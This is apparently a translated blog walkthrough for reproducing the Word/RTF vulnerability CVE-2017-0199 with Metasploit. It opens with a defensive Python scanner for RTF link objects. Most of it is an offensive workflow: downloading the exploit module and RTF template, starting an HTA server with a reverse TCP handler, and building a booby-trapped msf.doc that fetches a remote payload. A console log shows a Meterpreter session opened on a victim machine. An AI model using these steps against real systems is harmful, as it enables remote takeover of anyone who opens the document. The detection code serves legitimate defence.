CVE-2017-0199 & Metasploit: reproduction walkthrough


CVE-2017-0199 is a vulnerability in which an OLE object embedded in a Word/RTF document fetches and executes a remote file. No user interaction is required beyond opening the document.
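The mechanism just described (an OLE link object that Word updates from a remote URL as the document opens) leaves recognisable traces in the RTF source, which is what a defender can key on. The scanner below is an added example, not code from the original post or from the Metasploit module: it walks the balanced `{\object ...}` groups of an RTF file, flags the `\objautlink` and `\objupdate` control words, and decodes the `\*\objdata` hex stream to look for the URL Moniker CLSID ({79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}), which is the well-known indicator for this class of document. The two RTF samples inside it are constructed for the demonstration; neither is a real document or a working payload.

```python
import re
import uuid

# CLSID of the standard URL Moniker ({79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}).
# An OLE link object whose \objdata stream carries this CLSID resolves its
# target over a URL, which is what CVE-2017-0199 documents rely on.
URL_MONIKER_CLSID = uuid.UUID("79eac9e0-baf9-11ce-8c82-00aa004ba90b")
URL_MONIKER_BYTES = URL_MONIKER_CLSID.bytes_le  # little-endian, as serialised in the stream

CONTROL_WORDS = ("objautlink", "objupdate")  # automatic link + update on open


def _object_groups(text):
    """Return every balanced '{\\object ... }' group in the RTF text."""
    groups = []
    for m in re.finditer(r"\{\\object(?![a-zA-Z])", text):
        depth, i = 0, m.start()
        while i < len(text):
            c = text[i]
            if c == "\\" and i + 1 < len(text) and text[i + 1] in "{}\\":
                i += 2  # an escaped brace or backslash is not structural
                continue
            if c == "{":
                depth += 1
            elif c == "}":
                depth -= 1
                if depth == 0:
                    groups.append(text[m.start():i + 1])
                    break
            i += 1
    return groups


def _objdata_bytes(group):
    """Decode the hex payload of the first '\\*\\objdata' destination in an object group."""
    m = re.search(r"\\\*\\objdata(?![a-zA-Z])\s*([0-9A-Fa-f\s]*)", group)
    if not m:
        return b""
    hexstr = re.sub(r"\s+", "", m.group(1))
    if len(hexstr) % 2:
        hexstr = hexstr[:-1]  # tolerate a dangling nibble
    return bytes.fromhex(hexstr)


def scan_rtf(data):
    """Scan raw file bytes; key on content, never on the file extension."""
    text = data.decode("latin-1")
    result = {"is_rtf": text.startswith("{\\rtf"), "objects": 0,
              "indicators": [], "suspicious": False}
    if not result["is_rtf"]:
        return result
    found = set()
    for group in _object_groups(text):
        result["objects"] += 1
        for word in CONTROL_WORDS:
            if re.search(r"\\" + word + r"(?![a-zA-Z])", group):
                found.add(word)
        if URL_MONIKER_BYTES in _objdata_bytes(group):
            found.add("url_moniker_clsid")
    result["indicators"] = sorted(found)
    # The URL moniker alone is a strong signal; auto-link plus update-on-open
    # without it still deserves a closer look.
    result["suspicious"] = ("url_moniker_clsid" in found
                            or {"objautlink", "objupdate"} <= found)
    return result


# Constructed samples for the demonstration (not real documents, not payloads).
BENIGN_RTF = rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\f0\fs22 Quarterly report draft.\par}"

CONSTRUCTED_LINK_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\f0\fs22 Invoice attached.\par "
    rb"{\object\objautlink\objupdate\objw1\objh1{\*\objclass Word.Document.8}"
    rb"{\*\objdata 0105000002000000"
    + URL_MONIKER_BYTES.hex().encode("ascii")
    + rb"00000000}{\result{\pict\wmetafile8 0100}}}}"
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_RTF), ("link-object", CONSTRUCTED_LINK_RTF)):
        print(name, scan_rtf(sample))
```

Feed it the raw bytes of the attachment rather than trusting the name: the workflow on this page writes an RTF template out as msf.doc, so an extension-based rule would miss it. The check is a signature, not a full OLE parser; obfuscated samples (the hex interrupted by other RTF tokens, or the link object nested in another container) can evade it, so treat a miss as inconclusive and pair it with a proper RTF/OLE parser and sandbox detonation.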

First, update msf to the latest version. The latest version reportedly simplifies exploitation and drops the step of starting an HTA server, but I couldn't get that to work, so I used the old method.

Update msf, adding domestic (China) mirrors:

    # Tsinghua University
    #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
    #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

    # Zhejiang University
    #deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
    #deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

    # Neusoft University
    #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
    #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

    # Official source
    #deb http://http.kali.org/kali kali-rolling main non-free contrib
    #deb-src http://http.kali.org/kali kali-rolling main non-free contrib

I didn't use the Aliyun mirror because updating from it failed with a hash verification error.

    apt-get clean && apt-get update -y && apt-get -f upgrade -y
    msfupdate

Download the corresponding exploit module:

    cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
    wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

Download cve-2017-0199.rtf:

    cd /usr/share/metasploit-framework/data/exploits
    wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf

Start the HTA server:

    root@kali:~# msfconsole

         ,           ,
        /             \
       ((__---,,,---__))
          (_) O O (_)_________
             \ _ /            |\
              o_o \   M S F   | \
                   \   _____  |  *
                    |||   WW|||
                    |||     |||


    Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
    Learn more on http://rapid7.com/metasploit

           =[ metasploit v4.14.14-dev                         ]
    + -- --=[ 1642 exploits - 945 auxiliary - 289 post        ]
    + -- --=[ 473 payloads - 40 encoders - 9 nops             ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

    msf > use exploit/windows/misc/hta_server 
    msf exploit(hta_server) > show options 

    Module options (exploit/windows/misc/hta_server):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT  8080             yes       The local port to listen on.
       SSL      false            no        Negotiate SSL for incoming connections
       SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                   no        The URI to use for this exploit (default is random)


    Exploit target:

       Id  Name
       --  ----
       0   Powershell x86


    msf exploit(hta_server) > run
    [*] Exploit running as background job.

    [*] Started reverse TCP handler on 192.168.1.101:4444 
    [*] Using URL: http://0.0.0.0:8080/h48EGx964y.hta
    [*] Local IP: http://192.168.1.101:8080/h48EGx964y.hta
    [*] Server started.
    msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
    msf exploit(office_word_hta) > show options 

    Module options (exploit/windows/fileformat/office_word_hta):

       Name       Current Setting              Required  Description
       ----       ---------------              --------  -----------
       FILENAME                                no        The file name.
       TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.


    Exploit target:

       Id  Name
       --  ----
       0   Microsoft Office Word

Generate the payload .doc document:

    msf exploit(office_word_hta) > set TARGETURI http://192.168.1.101:8080/h48EGx964y.hta
    TARGETURI => http://192.168.1.101:8080/h48EGx964y.hta
    msf exploit(office_word_hta) > set FILENAME msf.doc
    FILENAME => msf.doc
    msf exploit(office_word_hta) > run

    [+] msf.doc stored at /root/.msf4/local/msf.doc
    msf exploit(office_word_hta) > 
    [*] 192.168.1.108    hta_server - Delivering Payload
    [*] 192.168.1.108    hta_server - Delivering Payload
    [*] Sending stage (957487 bytes) to 192.168.1.108
    [*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.108:11021) at 2017-05-03 00:30:58 +0800

    msf exploit(office_word_hta) > sessions -i

    Active sessions
    ===============

      Id  Type                     Information       Connection
      --  ----                     -----------       ----------
      1   meterpreter x86/windows  FEIYU\yu @ FEIYU  192.168.1.101:4444 -> 192.168.1.108:11021 (192.168.1.108)

    msf exploit(office_word_hta) > session 1
    [-] Unknown command: session.
    msf exploit(office_word_hta) > sessions -i 1
    [*] Starting interaction with 1...

Check on the target machine:

Note that not all versions are supported; my Office Plus 2013, for example, was not.
